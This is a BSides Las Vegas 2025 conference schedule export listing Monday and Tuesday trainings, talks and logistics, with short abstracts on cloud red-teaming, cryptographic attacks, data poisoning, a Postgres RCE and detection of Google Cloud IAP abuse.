Skytalks Token Drop 1 Skytalks token distribution for Monday MORNING sessions (10:00-11:30) Queue in Tuscany Hallway between Middle Ground and Speaker Room. Tokens are limited in number, and distribution ends when they are gone. PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/NYLF9K/ Hallway PUBLISH BU3CAX@@pretalx.com -BU3CAX Skytalks Token Drop 2 en en 20250804T123000 010000

Skytalks Token Drop 2

Skytalks Token Drop 2 Skytalks token distribution for Monday AFTERNOON sessions (2:00-4:00 PM) Queue in Tuscany Hallway between Middle Ground and Speaker Room. Tokens are limited in number, and distribution ends when they are gone. PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/BU3CAX/ Hallway PUBLISH MKBYQL@@pretalx.com -MKBYQL Info Booth Closes, Monday en en 20250804T190000 20250804T190000 000000

Info Booth Closes, Monday

Info Booth Closes, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/MKBYQL/ Hallway PUBLISH SBKTXT@@pretalx.com -SBKTXT Registration Closes, Monday en en 20250804T190000 20250804T190000 000000

Registration Closes, Monday

Registration Closes, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/SBKTXT/ Hallway PUBLISH D3ZJ83@@pretalx.com -D3ZJ83 Multi-Cloud (AWS, Azure & GCP) Security [25 Edition], Day One, AM en en 20250804T103000 20250804T143000 040000

Multi-Cloud (AWS, Azure & GCP) Security [25 Edition], Day One, AM

To make the workshop hands-on in the real sense all the trainees will be provided with Lab Access to the Multi-Cloud Environment. Lab Architecture is designed to cover all the attacks from both aspects that are demonstrated during the sessions. ### DAY 1 (8 Hrs) - Part-1 : Introduction about Multi Cloud Environment - Module-1 : Azure Cloud Environment - Azure Identity : Entra ID & RBAC - O365 / Microsoft 365 - Azure Cloud Services (VM, Storage, IaaS, PaaS, SaaS) - Module-2 : AWS Cloud Environment - Identity & Access Management - AWS Cloud Services (IaaS, PaaS, SaaS) - AWS identity Center - Module-3 : GCP Cloud Environment - GCP Identity & Access Management - GCP Cloud Services (IaaS, PaaS, SaaS) - Google Suite / Workspace + Cloud Identity - Part-2 : Enumeration & Initial Access on Cloud Infrastructure - Module-1 : Unauthenticated Enumeration - Enumerating Information from DNS Records - Enumerating Information from Cloud Vendors - Leaked secrets from github - Enumeration storage & other information from OSINT - Module-2 : Initial Access - Exploiting Cloud Services - Leaked Credentials - Compromising CI/CD pipeline - Compromising storage accounts - Module-3 : Authenticated Enumeration : IAM, Compute & Storage - AWS Services - Entra ID & Azure Services - Cloud Identity, Google Workspace, GCP Services ### DAY 2 (8 Hrs) - Part-3 : Exploiting Multi-Cloud Services - Module-1 : Exploiting Multi-Cloud Services - AWS : cross account, within account - Azure : service principal, cross tenant, Entra ID - GCP : Access organization, Cloud Identity - Module-2 : Privilege Escalation - Elevating Privileges on AWS - Elevating Privileges on Azure - Elevating Privileges on GCP - Part-4 : Lateral Movement - Module-1 : Within Multi-Cloud - AWS, GCP, Azure to each other - Part-5 : Case Study (Multi-Cloud Red Team Simulation) - Red Teaming in Simulated Multi-Cloud Lab (Initial Access to Data Exfiltration) ###### NOTE : Attendees do not require cloud accounts, they will get access to the seamless environment & have access to the environment for 15 days with a dedicated discord channel. - Why should people attend your course? - Practically Understand Enterprise Grade Red Team Operation Methodology in Multi-Cloud Environment - Perform Red Team Attack Cycle in Simulated Enterprise Environment - Stealth Lateral Movement Techniques in Multi-Cloud, Cloud to on-premise & vice-versa - Core Services Mapping / Enumeration / Exploitation - Create custom tools to perform manual enumeration - Student Requirements : - Fair Knowledge of Networking and Web Technology - Familiarity with CLI - An Open mind (*No prior Cloud knowledge is required). - Who Should Take This Course ? - Targeted Audience may include the following group of people: - Penetration Testers / Red Teams - Cloud Security Professionals - Cloud Architects - SOC analysts - Threat Hunting Team - Last but not the least, anyone who is interested in strengthening their offensive and detection capabilities in Cloud - How many years of practical experience would the ideal student have to get most out of this workshop? - Minimum 1-3 years in Penetration Testing Domain. - What Students Should Bring? - System with at least 16GB RAM having VMWare Workstation PRO installed - CWL RedCloud VM With Internet Connectivity - What Students Will Be Provided With? - Soft Copy of the Course Content. - Great Knowledge about the Offensive Cloud Techniques used by adversaries. - Defense Tactics & Techniques against the discussed offensive techniques. PUBLIC CONFIRMED Training-16h https://pretalx.com/security-bsides-las-vegas-2025/talk/D3ZJ83/ Ballroom Yash Bharadwaj Manish Gupta PUBLISH XH3PFM@@pretalx.com -XH3PFM Multi-Cloud (AWS, Azure & GCP) Security [25 Edition], Day One, PM en en 20250804T150000 20250804T190000 040000

Multi-Cloud (AWS, Azure & GCP) Security [25 Edition], Day One, PM

To make the workshop hands-on in the real sense all the trainees will be provided with Lab Access to the Multi-Cloud Environment. Lab Architecture is designed to cover all the attacks from both aspects that are demonstrated during the sessions. ### DAY 1 (8 Hrs) - Part-1 : Introduction about Multi Cloud Environment - Module-1 : Azure Cloud Environment - Azure Identity : Entra ID & RBAC - O365 / Microsoft 365 - Azure Cloud Services (VM, Storage, IaaS, PaaS, SaaS) - Module-2 : AWS Cloud Environment - Identity & Access Management - AWS Cloud Services (IaaS, PaaS, SaaS) - AWS identity Center - Module-3 : GCP Cloud Environment - GCP Identity & Access Management - GCP Cloud Services (IaaS, PaaS, SaaS) - Google Suite / Workspace + Cloud Identity - Part-2 : Enumeration & Initial Access on Cloud Infrastructure - Module-1 : Unauthenticated Enumeration - Enumerating Information from DNS Records - Enumerating Information from Cloud Vendors - Leaked secrets from github - Enumeration storage & other information from OSINT - Module-2 : Initial Access - Exploiting Cloud Services - Leaked Credentials - Compromising CI/CD pipeline - Compromising storage accounts - Module-3 : Authenticated Enumeration : IAM, Compute & Storage - AWS Services - Entra ID & Azure Services - Cloud Identity, Google Workspace, GCP Services ### DAY 2 (8 Hrs) - Part-3 : Exploiting Multi-Cloud Services - Module-1 : Exploiting Multi-Cloud Services - AWS : cross account, within account - Azure : service principal, cross tenant, Entra ID - GCP : Access organization, Cloud Identity - Module-2 : Privilege Escalation - Elevating Privileges on AWS - Elevating Privileges on Azure - Elevating Privileges on GCP - Part-4 : Lateral Movement - Module-1 : Within Multi-Cloud - AWS, GCP, Azure to each other - Part-5 : Case Study (Multi-Cloud Red Team Simulation) - Red Teaming in Simulated Multi-Cloud Lab (Initial Access to Data Exfiltration) ###### NOTE : Attendees do not require cloud accounts, they will get access to the seamless environment & have access to the environment for 15 days with a dedicated discord channel. - Why should people attend your course? - Practically Understand Enterprise Grade Red Team Operation Methodology in Multi-Cloud Environment - Perform Red Team Attack Cycle in Simulated Enterprise Environment - Stealth Lateral Movement Techniques in Multi-Cloud, Cloud to on-premise & vice-versa - Core Services Mapping / Enumeration / Exploitation - Create custom tools to perform manual enumeration - Student Requirements : - Fair Knowledge of Networking and Web Technology - Familiarity with CLI - An Open mind (*No prior Cloud knowledge is required). - Who Should Take This Course ? - Targeted Audience may include the following group of people: - Penetration Testers / Red Teams - Cloud Security Professionals - Cloud Architects - SOC analysts - Threat Hunting Team - Last but not the least, anyone who is interested in strengthening their offensive and detection capabilities in Cloud - How many years of practical experience would the ideal student have to get most out of this workshop? - Minimum 1-3 years in Penetration Testing Domain. - What Students Should Bring? - System with at least 16GB RAM having VMWare Workstation PRO installed - CWL RedCloud VM With Internet Connectivity - What Students Will Be Provided With? - Soft Copy of the Course Content. - Great Knowledge about the Offensive Cloud Techniques used by adversaries. - Defense Tactics & Techniques against the discussed offensive techniques. PUBLIC CONFIRMED Training-16h https://pretalx.com/security-bsides-las-vegas-2025/talk/XH3PFM/ Ballroom Yash Bharadwaj Manish Gupta PUBLISH VZH78P@@pretalx.com -VZH78P Introduction to Cryptographic Attacks en en 20250804T103000 20250804T143000 040000

Introduction to Cryptographic Attacks

This workshop will discuss the theory and practice of cryptographic attacks. We start with symmetric key cryptographic attacks starting with stream ciphers and how reuse of keystream can lead to exposing the plaintext. From there we move on to other symmetric key attacks. After the symmetric key attacks, we move on to the public key attacks that will primarily focus on private key recovery. Attacks on the keys will also include exporting to standard private key files. Many of these attacks can even be relevant to TLS and ssh as we will discuss. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/VZH78P/ Pearl Matt Cheung PUBLISH RNF79D@@pretalx.com -RNF79D Workshop on Cybersecurity Policy in Practice en en 20250804T150000 040000

Workshop on Cybersecurity Policy in Practice

The workshop is divided into four sessions – lecture, fishbowl activity, deep dive, and stakeholder breakout. Each of the lecture and deep dive sessions will be 45 minutes each, with 5 minutes for questions while the activity sessions are being set up. [45 minutes] Session 1: Expert Lecture [5 minutes] Q&A and Activity Setup [1 hour] Session 2: Fishbowl Activity [20 minutes] Break [45 minutes] Session 3: Deep Dive [5 minutes] Q&A and Activity Setup [1 hour] Session 4: Stakeholder Breakout Activity PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/RNF79D/ Pearl Jayati Dev Vaibhav Garg PUBLISH E7XNDF@@pretalx.com -E7XNDF From Command Line to Center Stage: Hack Your Way to Confident Speaking en en 20250804T103000 20250804T143000 040000

From Command Line to Center Stage: Hack Your Way to Confident Speaking

Public speaking is a skill that can elevate your career, expand your influence, and help you deliver impactful messages with clarity and confidence. Whether you're stepping onto the stage for the first time or looking to refine your delivery, this interactive workshop will equip you with the tools to present with poise and purpose. Led by a seasoned speaker with 20 years of experience, over 400 presentations delivered in the past five years, and training from world-class Toastmasters, this workshop is created to help you towards conquering stage fright, structure your thoughts effectively, and engage your audience with confidence. Drawing from a deep background in cybersecurity and professional speaking, this hands-on experience will push you out of your comfort zone—in the best way possible. By the end of the session, everyone will take the stage, delivering a short three-minute presentation while receiving constructive feedback in a supportive environment. You’ll walk away with practical techniques to control nerves, project authority, and own the room. If you’re ready to amplify your voice and master the art of public speaking, this workshop is for you! PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/E7XNDF/ Opal Erich Kron James McQuiggan PUBLISH G33FLE@@pretalx.com -G33FLE Engineering Cyber Resilience for the Water Sector en en 20250804T150000 20250804T190000 040000

Engineering Cyber Resilience for the Water Sector

This training session emerges from the Idaho National Laboratory Cyber Informed Engineering project, a Department of Energy supported effort to improve system resilience and risk reduction through design efforts to include cyber risks alongside other engineering considered hazards. Previous versions of this course have been conducted using different specific engineering problems to local industry groups. This class is a product from those experiences. The diversity of the BSidesLV attendee base will make this class much more engaging than an industry specific audience. Cyber-Informed Engineering (CIE) offers an opportunity to “engineer out” some cyber risk across the entire system lifecycle, starting from the earliest possible phases of conceptual design and requirements development and system design—the most optimal times to introduce mitigations against cyber risk. CIE is an emerging method to integrate cybersecurity risk considerations into the conception, design, development, and operation of any physical system that has digital connectivity, monitoring, or control. CIE uses design decisions and engineering controls to mitigate or even eliminate avenues for cyber-enabled attacks or reduce the consequences when an attack occurs. In the same way that engineers design systems for safety, engineers informed by CIE use similar methods to prevent or lessen the impact of a cyber-attack. CIE also allows the engineers to advise the approaches used by specialized Information Technology (IT) and Operational Technology (OT) cybersecurity experts to align cybersecurity mitigations to the most critical consequences identified by the engineers. What are the 12 principles of CIE? 1. Consequence-Focused Design 2. Engineered Controls 3. Secure Information Architecture 4. Design Simplification 5. Layered Defenses 6. Active Defense 7. Interdependency Evaluation 8. Digital Asset Awareness 9. Cyber-Secure Supply Chain Controls 10. Planned Resilience 11. Engineering Information Control 12. Organizational Culture The purpose of the training is to help people understand how to use these principles during engineering design to design out many sources of cyber risk. The hands-on workshop engages participants in a journey that helps improve their skills in designing out issues that would later potentially affect cyber risk. The session begins with a presentation of the principles for Cyber Informed Engineering and leads thoughts with an initiating question to prompt thoughts and actions for each principle. The scenario used to facilitate discussion is then presented, providing a template upon which the principles can then be addressed. The exercise then moves through the 12 principles where each is given an overview by one of the facilitators. What follows next is small group exercise tasks designed to facilitate the operationalization of each principle. The facilitators help the groups advance their discussion and learning. The training exercise concludes with a lessons-learned discussion. References: U.S. Department of Energy Office of Cybersecurity, Energy Security, and Emergency Response (CESER). Cyber Informed Engineering Implementation Guide. Version 1.0, August 7, 2023. https://www.osti.gov/biblio/1995796. Technical Report: Cyber-Informed Engineering Workbook: CIE Hands-On Training. Cyber-Informed Engineering Workbook: CIE Hands-On Training. May 29, 2024. https://www.osti.gov/biblio/2371031. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/G33FLE/ Opal Art Conklin Virginia “Ginger” Wright Andrew Ohrt PUBLISH RTRQJA@@pretalx.com -RTRQJA Building your own CA infrastructure on cheap HSMs en en 20250804T103000 20250804T143000 040000

Building your own CA infrastructure on cheap HSMs

This workshop teaches people to create their own Root Certificate. The key is stored on a Yubikey. The certificate includes name constraints suitable for including in a system trust store, both in your k8s pods and user devices. We then mint further name-constrained certificates used as online intermediates for each of user identity and pods. These intermediates can be stored online, or stored on their own HSMs. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/RTRQJA/ Emerald Mark Hahn Ted Hahn PUBLISH JELG8P@@pretalx.com -JELG8P Cyber Threat Landscaping Workshop en en 20250804T150000 20250804T190000 040000

Cyber Threat Landscaping Workshop

In today's digital age, cybersecurity is a critical concern for businesses and customers alike. Understanding and navigating the cyber threat landscape is essential for maintaining the integrity of your platforms and products. This workshop is designed to equip different business functions with the knowledge and tools necessary to analyze and update their threat landscapes, thereby enhancing our overall security posture and building greater trust with our customers. Participants will gain a solid foundation in cyber threat intelligence, including the identification of threat actors, tools, assets, and others. Participants will learn the significance of threat landscapes and how to effectively analyze and prioritize threats. Attendees will be guided through the process of creating and updating their specific threat landscapes, incorporating best practices for continuous improvement and new intelligence. Through interactive discussions and group activities, participants will leave with a heightened sense of trust and be equipped to promote this trust within their teams, products, and the broader industry. Together, we can enhance your companies reputation as a secure and trusted partner in the digital age. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/JELG8P/ Emerald Alexis Womble PUBLISH QGYKQ3@@pretalx.com -QGYKQ3 Cybersecurity Roleplaying Training: Design & Implement Engaging Incident Response Exercises en en 20250804T103000 040000

Cybersecurity Roleplaying Training: Design & Implement Engaging Incident Response Exercises

This intensive 4-hour workshop introduces cybersecurity professionals to an innovative roleplaying approach for incident response training. Moving beyond traditional tabletop exercises, participants will learn to design and implement dynamic scenarios that simulate the pressure, uncertainty, and collaborative decision-making required during real security incidents. ## Workshop Value Proposition Traditional IR exercises often fail to create authentic crisis environments or fully engage technical staff. This workshop presents a solution through: - Character-based roleplaying that builds cross-functional understanding - Game mechanics that simulate the uncertainty of real incidents - Dynamic scenarios that evolve based on team decisions - Collaborative problem-solving under realistic time constraints ## Workshop Structure ### Foundations (1 hour) After brief introductions, participants learn core incident response roleplaying mechanics including character roles, action resolution, and facilitation techniques. A live demonstration with volunteers showcases how these mechanics create realistic incident dynamics. ### Scenario Development (1 hour 15 minutes) Participants learn IR scenario design principles focused on: - Accurately representing attack patterns using MITRE ATT&CK - Creating realistic incident detection and investigation challenges - Simulating stakeholder management during incidents - Balancing technical accuracy with engaging gameplay Small groups then generate incident scenarios tailored to specific IR challenges like ransomware response, data breaches, or insider threats. ### Hands-On Development (1 hour) Groups develop detailed IR scenarios including: - Escalation patterns reflecting real attacker behavior - Decision points that test IR policies and procedures - "Injects" simulating stakeholder demands and technical complications - Round structures reflecting detection, containment, and recovery phases ### Implementation and Practice (30 minutes) Groups exchange scenarios for brief playtesting, providing immediate feedback. Participants then develop implementation plans for their own organizations, addressing team size, technical skill variance, and integration with existing IR programs. ### Conclusion (15 minutes) The workshop concludes with key takeaways and resources for continued development. ## IR Training Focus This workshop specifically addresses common IR training challenges: - Simulating the pressure of time-sensitive security decisions - Practicing stakeholder communications during incidents - Building cross-functional teamwork between technical and non-technical roles - Testing incident playbooks in unexpected scenarios - Creating safe environments to practice difficult decision-making - Developing empathy for various roles in the incident response process Participants leave with ready-to-implement IR scenarios designed to test and strengthen their organization's incident response capabilities through engaging, realistic simulations that go beyond traditional tabletops. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/QGYKQ3/ Diamond Klaus Agnoletti Glen Sorensen PUBLISH J98WLE@@pretalx.com -J98WLE From Code to Cloud: Securing Your Stack with Open-Source Tools en en 20250804T150000 20250804T190000 040000

From Code to Cloud: Securing Your Stack with Open-Source Tools

In a world where every Formula 1 team is backed by a security vendor, you might wonder: can open-source tools still compete—or are you just spinning your wheels? This workshop is for the builders, breakers, and defenders who want practical answers—not just enterprise-grade promises wrapped in AI buzzwords. Modern applications are built fast, assembled from open-source packages, deployed via IaC, and run in complex cloud environments. Every step adds attack surface—and attackers know it. But good security doesn’t have to start with a procurement call. In this session, we’ll walk through how to build a high-quality, layered security program using open-source tools. You’ll see live demos of tools like: - Trivy for container and dependency scanning (SCA), - GitLeaks and TruffleHog for secrets detection (even buried in git history), - Checkov for infrastructure-as-code scanning, - ZAP and Nuclei for DAST and API testing, - Bandit and OpenGrep for static analysis (SAST), - And Zen for runtime protection via in-app firewalls. Each tool will be shown in context—with real examples of how attackers exploit vulnerabilities in the wild: poisoned packages, typosquatting, exposed secrets, and cascading misconfigurations. We’ll explore famous breaches (like Log4Shell, EventStream, and Twitch’s git leak) and dissect how open-source tools could have detected or blocked the compromise. You'll learn how to: - Chain these tools together with CI/CD pipelines, Git hooks, and IDEs, - Choose when to “build vs. buy”, - And design a Minimal Viable Security Stack that offers solid coverage without budget strain. We’ll also cover the limitations of OSS tools—because yes, you’ll miss some dashboards, reporting, and support—but for many teams, those are trade-offs worth making. Especially when the alternative is no security at all. This workshop is ideal for: - Developers looking to shift security left without killing velocity, - Security engineers who need effective, budget-conscious coverage, - Startups and small teams who want the protection, not the pitch. By the end, you’ll have a working blueprint, tool configurations, and clarity on what matters most. Whether you’re a lone dev or scaling a team, this session will give you the tactical toolkit to secure what you build—with tools the community trusts. PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/J98WLE/ Diamond Mackenzie Jackson PUBLISH PET8DL@@pretalx.com -PET8DL Career Campaigns: A Tabletop RPG Workshop for Your Next Infosec Role, Monday AM en en 20250804T103000 040000

Career Campaigns: A Tabletop RPG Workshop for Your Next Infosec Role, Monday AM

Join us for a tabletop roleplaying game (RPG) with real-world wins! Participant-players seeking their first role in cyber – or simply transitioning to a new specialization – will transform their current resume's "character sheet" into a freshly reskilled or dual-classed hero, ready to take on any cybersecurity hiring process for your next infosec campaign. “You're new to these parts, traveler. Want to join a new infosec campaign party I’m forming? We’re defending the castle, and don’t have enough heroes to – wait. Where’s your sword?! You can’t defend with a *lute*!” Actually, you *can.* See, in 2023, I faced that same skepticism from infosec hiring managers: No IT or cyber background, so I clearly didn't have what it took to be a cybersecurity professional. After a slew of rejections, I found some old 20-sided-dice… and I realized I needed to completely reframe my previous career. Now? I’m a threat intel analyst at a major insurance provider, helping my team translate technical research and controls into actionable recommendations for the business. Let me show you how you, too, can pivot into information security during this three-hour RPG tabletop campaign-workshop. I’ll guide participant-players through a modern infosec hiring process RPG tabletop “campaign” workshop, acting as the game master as participant-players reskill their classes and adjust their application strategies to win a coveted role for their infosec party. In the end, you’ll walk away with concrete research, tools, and techniques to help your next employer properly value and respect your current non-infosec skills and experience in your first (or next!) infosec role. PUBLIC CONFIRMED Training-8h https://pretalx.com/security-bsides-las-vegas-2025/talk/PET8DL/ Boardroom Stryker PUBLISH XRWXY9@@pretalx.com -XRWXY9 Career Campaigns: A Tabletop RPG Workshop for Your Next Infosec Role, Monday PM en en 20250804T150000 20250804T190000 040000

Career Campaigns: A Tabletop RPG Workshop for Your Next Infosec Role, Monday PM

“You're new to these parts, traveler. Want to join a new infosec campaign party I’m forming? We’re defending the castle, and don’t have enough heroes to – wait. Where’s your sword?! You can’t defend with a *lute*!” Actually, you *can.* See, in 2023, I faced that same skepticism from infosec hiring managers: No IT or cyber background, so I clearly didn't have what it took to be a cybersecurity professional. After a slew of rejections, I found some old 20-sided-dice… and I realized I needed to completely reframe my previous career. Now? I’m a threat intel analyst at a major insurance provider, helping my team translate technical research and controls into actionable recommendations for the business. Let me show you how you, too, can pivot into information security during this three-hour RPG tabletop campaign-workshop. I’ll guide participant-players through a modern infosec hiring process RPG tabletop “campaign” workshop, acting as the game master as participant-players reskill their classes and adjust their application strategies to win a coveted role for their infosec party. In the end, you’ll walk away with concrete research, tools, and techniques to help your next employer properly value and respect your current non-infosec skills and experience in your first (or next!) infosec role. PUBLIC CONFIRMED Training-8h https://pretalx.com/security-bsides-las-vegas-2025/talk/XRWXY9/ Boardroom Stryker PUBLISH B7DJJN@@pretalx.com -B7DJJN Ask the Fed (Token 01) en en 20250804T100000 20250804T110000 010000

Ask the Fed (Token 01)

N/A PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/B7DJJN/ Misora Noah K Joel Max Tim Weston Matt Donald McFarlane PUBLISH FKHVV8@@pretalx.com -FKHVV8 The Botnet Strikes Back: how we assembled a coalition to take down a criminal network & their all-out response (Token02) en en 20250804T140000 20250804T144500 004500

The Botnet Strikes Back: how we assembled a coalition to take down a criminal network & their all-out response (Token02)

n/a PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/FKHVV8/ Misora Ryan English PUBLISH DLGT8N@@pretalx.com -DLGT8N The Remote Grift: Cunning Meets Naivete, and the Victims Become the Criminals (Token 03) en en 20250804T150000 20250804T154500 004500

The Remote Grift: Cunning Meets Naivete, and the Victims Become the Criminals (Token 03)

n/a PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/DLGT8N/ Misora Ira Victor PUBLISH XNRJTZ@@pretalx.com -XNRJTZ Real Life Needs an ESP Overlay — So we Made One! (Token 04) en en 20250804T160000 20250804T162000 002000

Real Life Needs an ESP Overlay — So we Made One! (Token 04)

n/a PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/XNRJTZ/ Misora Alex Thines Brad "Sno0ose" Ammerman PUBLISH RWPBDF@@pretalx.com -RWPBDF Oh Hotel No!: How A Hopeless Hooligan Helped A Homie From Homeless To Homeowner In 9 Months (Token 05) en en 20250804T170000 20250804T174500 004500

Oh Hotel No!: How A Hopeless Hooligan Helped A Homie From Homeless To Homeowner In 9 Months (Token 05)

n/a PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/RWPBDF/ Misora Justin Varner PUBLISH AQZJX7@@pretalx.com -AQZJX7 Indexing the Chaos: Extracting PII from Ransomware Leaks (Token 06) en en 20250804T180000 20250804T184500 004500

Indexing the Chaos: Extracting PII from Ransomware Leaks (Token 06)

HIBR was born out of frustration. Everyone’s talking about ransomware, but nobody wants to touch the fallout. I’m talking about the public dumps. The .7z files on sketchy TOR mirrors. The PDFs titled “contracts” that are actually scanned IDs from Ecuador to Estonia. Most breach tools ignore these. They’re messy, hard to parse, and a legal migraine. So I built a system that does parse them, responsibly (as much as that’s possible), and answers one burning question: was my real-life data dumped by ransomware goons and forgotten? We built: A crawler (breach.house) that grabs leaks from known ransomware groups, also breaches, stealer logs and leads. A processor that unzips the chaos, runs OCR over images, extracts text, and feeds it to an LLM trained to recognize personal data patterns (ID numbers, names, passport, driver license, ssn, etc). A frontend (haveibeenransom.com) that lets you search for your email or ID without ever exposing the raw data. This talk will include: Real examples (redacted) of exposed IDs, tax files, and the dumbest things people name their internal folders. The tradeoffs between “public service” and “this might get me a GDPR fine.” A walkthrough of the tool, how it works, what it does well, and where it could go sideways. This is the side of breach awareness people pretend isn’t there. We're not pretending. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/AQZJX7/ Misora Juanma PUBLISH RJXCQH@@pretalx.com -RJXCQH Skytalks Reception en en 20250804T200000 20250804T220000 020000

Skytalks Reception

Skytalks Reception PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/RJXCQH/ Suite 1702 PUBLISH NMSLMR@@pretalx.com -NMSLMR Morning Trainings, Monday en en 20250804T103000 20250804T143000 040000

Morning Trainings, Monday

Morning Trainings, Monday PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/NMSLMR/ Foyer, Platinum Hotel Conference Center PUBLISH JDGG7P@@pretalx.com -JDGG7P Trainer Box Lunches Delivered, Monday en en 20250804T143000 20250804T143000 000000

Trainer Box Lunches Delivered, Monday

Trainer Box Lunches Delivered, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/JDGG7P/ Foyer, Platinum Hotel Conference Center PUBLISH NJPLSK@@pretalx.com -NJPLSK Afternoon Trainings, Monday en en 20250804T150000 040000

Afternoon Trainings, Monday

Afternoon Trainings, Monday PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/NJPLSK/ Foyer, Platinum Hotel Conference Center PUBLISH YGTMLX@@pretalx.com -YGTMLX Opening Remarks, Tuesday en en 20250805T093000 002500

Opening Remarks, Tuesday

Opening Remarks, Tuesday PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/YGTMLX/ Florentine A milqtst PUBLISH RK9DQ9@@pretalx.com -RK9DQ9 Poison in the Wires: Interactive Network Visualization of Data Attacks en en 20250805T100000 20250805T102000 002000

Poison in the Wires: Interactive Network Visualization of Data Attacks

This talk branches off of my original research that I have been developing since August 2024. I have been researching data poisoning and also applying graph theory to cybersecurity. I developed this talk after speaking about theoretically visualizing poisoning networks. In this talk, I actually want to visualize poisoning training data with a custom GUI. After talking through some graph theory and data poisoning basics, I’ll show how poisoned training data messes with AI using an interactive network visualization tool I built. I wanted to emphasize how visualizing vulnerabilities makes it easier to understand and execute them, particularly in the AI red teaming space. The audience will see how bad data creates weird structures in graphs beyond just data differences. It’s like watching a model get hacked from the inside, but in a way you can actually see and explore. The tool is open source, works with local data, and helps make these attacks way more understandable (and fun to mess with). The talk is made for audiences who like machine learning, graphs, and red teaming, which at its core, is just breaking things apart into smaller, more understandable pieces. I enjoy being able to contribute a graphical perspective to hacking in general, I think that being able to visually represent an attack graphically and accurately can help make the vulnerability more interactive and easier to understand. I wanted to be able to show that AI models are as breakable as anything else, and a great way to show that is through visualization with networks. https://youtu.be/7z6YAgggw-o?si=n5bhWkHmRlL76eCn PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/RK9DQ9/ Florentine A Maria Khodak PUBLISH WKALMR@@pretalx.com -WKALMR Rusty pearls: Postgres RCE on cloud databases en en 20250805T103000 20250805T105000 002000

Rusty pearls: Postgres RCE on cloud databases

In this session, we will describe how an attempt to find a vulnerability in a popular IaaS provider led to the discovery of this issue and how we leveraged it along with several other bugs into an RCE. We will explain the operation of cloud-managed PostgreSQL and our approach to testing it. Additionally, we will present a series of vulnerabilities identified and discuss how exploitation of these techniques can be detected in AWS, other cloud providers, and databases that are not managed by a cloud provider. A demonstration of the vulnerability on a local instance will be provided, followed by a summary of takeaways related to using open-source code, shared responsibility models, and cloud security best practices. We will bring our story, which was overall a challenging and exciting experience that ended with our database being blocked, and further collaboration with AWS. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/WKALMR/ Florentine A Coby Abrams Tal Peleg PUBLISH TDYSX8@@pretalx.com -TDYSX8 No IP, No Problem: Exfiltrating Data Behind IAP en en 20250805T110000 20250805T112000 002000

No IP, No Problem: Exfiltrating Data Behind IAP

This talk delivers a technical dive into Google Cloud’s IAP, a service widely used to enforce access controls on internal applications - and often assumed to be foolproof. We begin with a concise overview of how IAP works behind the scenes, including its identity enforcement model and how it integrates with IAM and backend services. The goal of this talk isn’t just to highlight common misconfigurations and warn people not to repeat them, because plenty of blog posts already do that. Instead, the core focus is on teaching defenders how these misconfigurations manifest in logs once an attacker begins to exploit them, equipping them to build effective detections and stop breaches before they escalate. Whether it’s during the initial configuration tampering or while actively bypassing controls, I’ll walk through what those activities actually look like in GCP logs. For each misconfiguration, I’ll present real log snippets, unpack the most revealing details, and show how to correlate signals, even those outside of IAP-specific logs, to detect and investigate IAP abuse effectively. The highlight of the session is a new research technique we've developed: exploiting IAP's CORS behavior to exfiltrate sensitive data using preflight OPTIONS requests, effectively bypassing traditional network egress controls. This method can succeed even in highly restricted environments with no internet access, no public IPs, and VPC Service Controls fully enforced. The issue has been responsibly disclosed to Google and is currently under review, with an expected review timeline of 30 days. We’re sharing this research to highlight just how fragile IAP configurations can be, where even a minor misstep or overlooked setting can unintentionally expose internal resources to the internet. Alongside the technique, we’ll provide practical detection strategies to help defenders identify this specific attack vector through GCP’s logging infrastructure. We’ll wrap up by walking through practical detection strategies using GCP’s audit and access logs, showing how to identify abuse patterns, correlate signals across services, and improve visibility into how IAP is being used (or misused). These techniques are designed to help defenders surface subtle signs of exploitation and build more resilient monitoring around one of GCP’s most sensitive access gateways. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/TDYSX8/ Florentine A Ariel Kalman PUBLISH 9FF3LX@@pretalx.com -9FF3LX Vulnerabilities Beyond CVEs: Cyber Resilience and the Next Financial Crisis en en 20250805T113000 20250805T121500 004500

Vulnerabilities Beyond CVEs: Cyber Resilience and the Next Financial Crisis

